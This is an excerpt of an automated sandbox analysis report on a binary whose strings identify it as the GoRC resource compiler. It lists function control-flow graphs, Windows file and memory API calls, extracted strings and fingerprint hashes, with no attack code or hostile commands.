                                                                                                                                                                                                • Instruction ID: 0e2890aec93c6080f6b56c14420a1f25c5d0b9c841df873fc03b08fb74611db6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 56aa49c43a02b4d8b323e285e173ed64c4dfb729c781d691af90392fedcd1c3d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B092F4A9030070E834AA255C07F5608485748F0AFE0066A3340380CD08ECB240012D

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00402463 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 318memorytimeCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 219 402463-40246c 220 40246e-402472 219->220 221 4024cf 219->221 220->221 222 402474-40247b 220->222 223 4024d4-4024d9 call 40113f 221->223 222->221 224 40247d-402484 222->224 226 402486-40248c 224->226 228 4024da 226->228 229 40248e-40249f 226->229 230 4024dc-402506 228->230 231 4024bf-4024c6 228->231 229->221 232 4024a1-4024a8 229->232 233 402508-40250c 230->233 234 40250f-40258a VirtualAlloc * 2 GetSystemTimeAsFileTime 230->234 231->230 236 4024c8-4024cd 231->236 232->226 235 4024aa-4024bd call 401dfd 232->235 233->234 237 402590-4025ae 234->237 238 40258c 234->238 235->226 236->223 240 4025b0-4025b5 237->240 241 4025b6-402607 call 40236e 237->241 238->237 240->241 244 40260c-402611 call 4021b7 241->244 247 402613-402618 call 4022f9 244->247 248 40261a-40261f call 401e1e 244->248 247->244 253 402623-402628 call 4021d4 248->253 256 402631-402655 call 401e1e 253->256 257 40262a-40262f call 4022e1 253->257 262 402695-4026a0 256->262 263 402657-40265c call 40236e call 40235a 256->263 257->253 264 4026e0-402709 262->264 265 4026a2-4026a7 call 40236e call 40235a 262->265 280 402661-402666 call 402298 263->280 268 402759-402764 264->268 269 40270b-402716 264->269 281 4026ac-4026b1 call 4022be 265->281 274 402766-40276c 268->274 272 402755-402757 269->272 273 402718 269->273 272->268 272->269 277 40271b-402723 call 40236e call 40235a 273->277 278 4027ad-4027c2 274->278 279 40276e-402779 274->279 316 402728-40272d call 402161 277->316 282 4027c4-4027c7 278->282 283 4027de-40282c 278->283 285 402794-402798 279->285 286 40277b-40278a 279->286 298 402668-40266d call 4022f9 280->298 299 40266f-402674 call 401e1e 280->299 312 4026b3-4026b8 call 4022f9 281->312 313 4026ba-4026bf call 401e1e 281->313 282->283 291 4027c9-4027d0 282->291 293 402835-402847 283->293 294 40282e-402833 call 402421 283->294 285->274 289 40279a-4027a1 285->289 295 40278c 286->295 296 40278f-402792 286->296 300 4027a3 289->300 301 4027a6-4027a9 289->301 304 4027d2-4027d7 call 402402 291->304 305 4027d9 call 4023e4 291->305 302 40284a-40284f call 40161b 293->302 294->302 295->296 296->285 296->286 298->280 327 402678-40267d call 40224f 299->327 300->301 301->289 311 4027ab 301->311 325 402851-40285b call 40113f 302->325 326 40286f-402894 VirtualFree * 2 302->326 304->283 305->283 311->274 312->281 334 4026c3-4026c8 call 402275 313->334 330 402733 316->330 331 40285d-40286a call 4020e5 call 40113f 316->331 325->326 344 402686-402693 call 401e1e 327->344 345 40267f-402684 call 4022e1 327->345 335 402735-402744 call 4022e1 call 40238f 330->335 336 402746-402753 call 401e1e 330->336 331->326 347 4026d1-4026de call 401e1e 334->347 348 4026ca-4026cf call 4022e1 334->348 335->316 336->272 336->277 344->262 344->263 345->327 347->264 347->265 348->334
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,-00000200,00001000,00000004,00000000,-00000200,00001000,00000004,?,00402B43,000000F5,004028B5), ref: 0040252E
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,-00000200,00001000,00000004,00000000,-00000200,00001000,00000004,?,00402B43,000000F5,004028B5), ref: 0040253D
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00409030,00000000,-00000200,00001000,00000004,00000000,-00000200,00001000,00000004,?,00402B43,000000F5,004028B5), ref: 00402552
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00008000), ref: 0040287C
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00008000,00000000,00008000), ref: 0040288E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw, xrefs: 00402865
                                                                                                                                                                                                • The system could not make the OBJ output file, xrefs: 00402851
                                                                                                                                                                                                • No resources found in RES file, xrefs: 004024C8
                                                                                                                                                                                                • IA04, xrefs: 00402842
                                                                                                                                                                                                • RES file is not a valid 32-bit RES file or may have been corrupted, xrefs: 004024CF
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Virtual$AllocFreeTime$FileSystem
                                                                                                                                                                                                • String ID: IA04$No resources found in RES file$RES file is not a valid 32-bit RES file or may have been corrupted$The system could not make the OBJ output file$Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw
                                                                                                                                                                                                • API String ID: 1523473439-584778794
                                                                                                                                                                                                • Opcode ID: a0b89be4506dde248bfe18314c3076b2a3f776c20a59d965ca9ddc2276eb6c67
                                                                                                                                                                                                • Instruction ID: 7a24f3ee92391e3ff881cd49dae94e8a9d438aa6ef7ab22a4f0ab805921620bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b89be4506dde248bfe18314c3076b2a3f776c20a59d965ca9ddc2276eb6c67
                                                                                                                                                                                                • Instruction Fuzzy Hash: 28B1D23090060197E724AF79DB09716B7A1BB84314F14C43FE909B72E6D6BD9C42CB9D
                                                                                                                                                                                                Function 0040161B Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 69fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 362 40161b-401622 363 401624-401636 362->363 364 401655-401661 362->364 365 401638 363->365 366 40163a-401644 363->366 367 401663-40166a 364->367 368 40166c call 401bdb 364->368 365->366 369 401646-401648 366->369 370 40164f-401651 366->370 367->368 371 401671-40168b 367->371 368->371 369->370 373 40164a 369->373 370->364 374 401695 CreateFileA 371->374 375 40168d-401693 CreateFileW 371->375 373->370 376 40169a-40169d 374->376 375->376 377 4016a1-40170a SetFilePointer WriteFile * 2 SetEndOfFile CloseHandle call 4011ec 376->377 378 40169f-4016a0 376->378
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0040284F), ref: 0040168D
                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0040284F), ref: 00401695
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000,0040284F), ref: 004016AA
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,-00409008,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000,0040284F), ref: 004016C9
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,-00409010,00409000,00000000,00000000,-00409008,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000), ref: 004016E8
                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000,00000000,-00409010,00409000,00000000,00000000,-00409008,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001), ref: 004016EE
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,-00409010,00409000,00000000,00000000,-00409008,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000), ref: 004016F4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateWrite$CloseHandlePointer
                                                                                                                                                                                                • String ID: .OBJ$.obj
                                                                                                                                                                                                • API String ID: 2563392227-3965422643
                                                                                                                                                                                                • Opcode ID: a98f8ccf5907bb036cf6838685fc5960560acb09480f2d7b218ec7d64b4ed3a8
                                                                                                                                                                                                • Instruction ID: ee0e7c6950c8f1cf897b8c2b54a349e53cdf0d7587b5c291b570de57655dc948
                                                                                                                                                                                                • Opcode Fuzzy Hash: a98f8ccf5907bb036cf6838685fc5960560acb09480f2d7b218ec7d64b4ed3a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4721573434064027E7309B785F05F9A2E915B86318F28863AF5903A2F6C77D5D91D79E
                                                                                                                                                                                                Function 0040153C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 68fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 381 40153c-401543 382 401545-401552 381->382 383 401576-401582 381->383 386 401554-401559 382->386 387 40155b-401565 382->387 384 401584-40158b 383->384 385 40158d call 401bdb 383->385 384->385 388 401592-4015ac 384->388 385->388 386->387 390 401570-401572 387->390 391 401567-401569 387->391 392 4015b6 CreateFileA 388->392 393 4015ae-4015b4 CreateFileW 388->393 390->383 391->390 394 40156b 391->394 395 4015bb-4015be 392->395 393->395 394->390 396 4015c0-4015c1 395->396 397 4015c2-4015db SetFilePointer 395->397 398 401613-40161a CloseHandle 397->398 399 4015dd-4015f3 WriteFile 397->399 399->398 400 4015f5-401612 SetEndOfFile CloseHandle call 4011ec 399->400
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,00402AE6,000000F5,004028B5), ref: 004015AE
                                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,00402AE6,000000F5,004028B5), ref: 004015B6
                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000,00402AE6,000000F5,004028B5), ref: 004015CB
                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,-0040AAC0,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000,00402AE6), ref: 004015EC
                                                                                                                                                                                                • SetEndOfFile.KERNEL32(00000000,00000000,-0040AAC0,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 004015F6
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,-0040AAC0,00409000,00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080), ref: 004015FC
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000002,00000080,00000000,00402AE6,000000F5,004028B5), ref: 00401614
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CloseCreateHandle$PointerWrite
                                                                                                                                                                                                • String ID: .RES$.res
                                                                                                                                                                                                • API String ID: 2606874340-3578776368
                                                                                                                                                                                                • Opcode ID: fb8aa3cfc322bb2f0b1b6718075586022dd872c51e31590752d6d2ec5a9d7f55
                                                                                                                                                                                                • Instruction ID: b897d40d4d49bc5507eb1f754498c327ecc2b9202552186b7000fe3f0e9b6693
                                                                                                                                                                                                • Opcode Fuzzy Hash: fb8aa3cfc322bb2f0b1b6718075586022dd872c51e31590752d6d2ec5a9d7f55
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD110670A0464036E734AB346F06F5A2E901BC6724F288636F6527A2F6C7BC4D81D26E
                                                                                                                                                                                                Function 004019D3 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 175stringCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 438 4019d3-401a23 GetCommandLineW lstrlenW call 4080e4 441 401a82-401a8b 438->441 442 401a25-401a29 438->442 443 401adb-401ae3 441->443 444 401a8d 441->444 445 401a2b-401a2d 442->445 446 401a2f-401a31 442->446 447 401ad1-401ad6 call 40113f 444->447 445->446 448 401a35 445->448 446->441 449 401a33 446->449 447->443 450 401a37-401a39 448->450 449->450 450->441 452 401a3b-401a40 call 40170b 450->452 452->441 455 401a42-401a47 452->455 456 401a49-401a4b 455->456 457 401a4d-401a50 455->457 456->457 458 401a8f-401aa2 456->458 459 401a52-401a5a call 401819 457->459 460 401a63-401a6a 457->460 461 401aa3-401aa8 458->461 459->441 467 401a5c 459->467 460->441 463 401aaa 461->463 464 401aae-401ab8 461->464 463->461 466 401aac 463->466 468 401ac0-401ac5 464->468 469 401aba-401abe 464->469 466->447 467->452 470 401a5e-401a61 467->470 472 401acf 468->472 469->468 471 401ac7 469->471 470->460 473 401a6c-401a6f 470->473 474 401ac9-401acd 471->474 472->447 472->474 475 401a71-401a73 473->475 476 401a7b-401a80 call 401717 473->476 474->472 477 401ae4-401ae8 474->477 475->441 479 401a75-401a77 475->479 476->441 476->452 477->447 478 401aea-401af4 477->478 481 401af6 478->481 482 401af7-401afc 478->482 479->441 483 401a79 479->483 481->482 485 401afe-401b02 482->485 483->452 486 401b04 485->486 487 401b06-401b0b 485->487 486->487 487->485 488 401b0d-401b17 487->488 489 401b19-401b21 488->489 490 401b23-401b25 489->490 491 401b37-401b48 489->491 492 401b27-401b29 490->492 493 401b2d-401b35 490->493 494 401b56-401b5a 491->494 495 401b4a-401b4e 491->495 492->493 498 401b2b 492->498 496 401ba8-401bb5 493->496 494->496 497 401b5c 494->497 495->494 499 401b50-401b54 495->499 501 401bb7 496->501 502 401bbe-401bcc 496->502 500 401ba1-401ba6 497->500 498->489 498->493 499->494 503 401b5e-401b6b 499->503 506 401bcd-401bda call 40113f 500->506 501->502 504 401b7b-401b7f 503->504 505 401b6d-401b72 503->505 504->500 508 401b81-401b8f 504->508 505->504 507 401b74-401b79 505->507 507->500 507->504 508->496 510 401b91-401b98 508->510 510->496 512 401b9a-401b9f 510->512 512->506
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCommandLineW.KERNEL32(00402A57,000000F5,004028B5), ref: 004019E1
                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000,00402A57,000000F5,004028B5), ref: 004019E9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Res, xrefs: 00401B6D
                                                                                                                                                                                                • RES, xrefs: 00401B66
                                                                                                                                                                                                • RES source file specified and also RES output file specified, xrefs: 00401B9A
                                                                                                                                                                                                • Wrong extension given for source file - must be RC or RES, xrefs: 00401BA1
                                                                                                                                                                                                • Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw, xrefs: 00401AD1
                                                                                                                                                                                                • res, xrefs: 00401B74
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CommandLinelstrlen
                                                                                                                                                                                                • String ID: RES$RES source file specified and also RES output file specified$Res$Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw$Wrong extension given for source file - must be RC or RES$res
                                                                                                                                                                                                • API String ID: 3227309831-192148266
                                                                                                                                                                                                • Opcode ID: c20c345e636865be974981c0ebb2e6e593b104279e3f040bd7c7c48a0f4d310e
                                                                                                                                                                                                • Instruction ID: 569e53e0e0be9da93b04a9fef60a6a5ed02f02d466f8e066264a9d2a4780d4b4
                                                                                                                                                                                                • Opcode Fuzzy Hash: c20c345e636865be974981c0ebb2e6e593b104279e3f040bd7c7c48a0f4d310e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0151E124B4A28046EB25436CA6193627B928796324F5C82BBC483367F7D67C0D87CB5F
                                                                                                                                                                                                Function 00401FE4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 51COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 542 401fe4-401fe9 543 402057-402072 WideCharToMultiByte 542->543 544 401feb-401ff8 542->544 547 402074-402077 543->547 545 40204a-402051 call 401000 544->545 546 401ffa-402002 544->546 558 402052-402055 545->558 549 402004-40200f 546->549 550 40201f-402027 546->550 554 402011 549->554 555 402016-40201d call 40104e 549->555 551 402033-402038 call 40104e 550->551 552 402029-402031 550->552 551->558 552->551 556 40203a-402046 call 401fa1 552->556 554->555 555->545 556->554 564 402048 556->564 558->547 564->558
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000,0040211E,?,00402865,-00000200,00001000,00000004,00000000,-00000200), ref: 00402068
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw, xrefs: 00402060
                                                                                                                                                                                                • MENU or MENUEX, xrefs: 0040201F
                                                                                                                                                                                                • User-defined type , xrefs: 00402004
                                                                                                                                                                                                • DIALOG or DIALOGEX, xrefs: 00402029
                                                                                                                                                                                                • Unknown type , xrefs: 00402011
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                                                                                                • String ID: DIALOG or DIALOGEX$MENU or MENUEX$Unknown type $Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw$User-defined type
                                                                                                                                                                                                • API String ID: 626452242-3816753744
                                                                                                                                                                                                • Opcode ID: e4ede644f3ce2359eaa776128306967e4e6e4494e1664ccf19caf2374efab68c
                                                                                                                                                                                                • Instruction ID: 744f24d2f6dd1e0e0e4046120ad46dabcba15a3718be125d81f0a769f485712b
                                                                                                                                                                                                • Opcode Fuzzy Hash: e4ede644f3ce2359eaa776128306967e4e6e4494e1664ccf19caf2374efab68c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C012620B0831112E62036245FCA72A10549781718F258133FB557F6E7D9FE5C83EA5E
                                                                                                                                                                                                Function 00401C8E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileMappingW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00402A95,000000F5,004028B5), ref: 00401CA7
                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(00000000,00000002,00000000,00000000,00000000,00402A95), ref: 00401CAF
                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00402A95,000000F5,004028B5), ref: 00401CC6
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00402A95,000000F5,004028B5), ref: 00401CDC
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Could not read from source file (, xrefs: 00401CF2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateMapping$SizeView
                                                                                                                                                                                                • String ID: Could not read from source file (
                                                                                                                                                                                                • API String ID: 1203282901-904936545
                                                                                                                                                                                                • Opcode ID: a403cdf34ae90850b42fc3fe710e26e4a3cff5730a2263c464332419e8ca69b3
                                                                                                                                                                                                • Instruction ID: 6793d3d510f88da4f3a4a8526edeb986523105ba562e02882286e51d48df84c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: a403cdf34ae90850b42fc3fe710e26e4a3cff5730a2263c464332419e8ca69b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF03AB07C4350AAFB249B259F06B552AA06704B54F24023AB651B92F3D6BCD910DA1E
                                                                                                                                                                                                Function 00401CFE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32memoryfileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00402B33,000000F5,004028B5), ref: 00401D06
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,00402B33,000000F5,004028B5), ref: 00401D1C
                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00409000,00000000,00000000,00000000,00001000,00000004,00000000,00402B33,000000F5,004028B5), ref: 00401D4A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Insufficient memory for the task, xrefs: 00401D21
                                                                                                                                                                                                • Could not read from source file (, xrefs: 00401D54
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
